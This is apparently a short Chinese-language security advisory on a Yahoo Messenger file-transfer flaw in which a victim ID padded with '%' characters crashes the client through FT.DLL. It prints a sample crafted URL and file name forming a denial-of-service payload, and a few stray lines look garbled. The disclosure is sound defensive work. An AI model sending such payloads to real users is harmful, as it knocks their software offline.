詳細(xì)描述:
Yahoo messenger中的文件傳輸選項(xiàng)漏洞能讓遠(yuǎn)程攻擊者關(guān)閉受害人的yahoo messenger客戶端。
Yahoo messenger能過(guò)濾掉yahooID中的一些特別字符(象&,?),當(dāng)攻擊者發(fā)送一個(gè)文件到 “受害人的ID%%%%%%%%%(超過(guò)73個(gè)字符)”時(shí),服務(wù)器端過(guò)濾掉%字符署名“受害者ID”并打開(kāi)一個(gè)文件傳輸會(huì)話,如果受害人接受了這個(gè)文件,他的客戶端就會(huì)提示存取出錯(cuò)并關(guān)閉,出錯(cuò)的原因是負(fù)責(zé)yahoo messenger P2P文件傳輸中的一個(gè)FT.DLL文件造成的。
攻擊者發(fā)送給受害者機(jī)器的樣本地址:
http://10.10.10.1:81/Messenger.victimid%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25.1066206307331File.txt?AppID=Messenger&UserID=victimid%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25&K=lc9ly5954h9doeawsg31h9tgta6c7dtod8bqxrt2vykgw5e5j9dao0o9 doeawsg31h9t8vey6uq19
6y 14 53
Messenger.vicitimid%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%.1066377306549File.TXT
補(bǔ)?。?http://cn.messenger.yahoo.com/
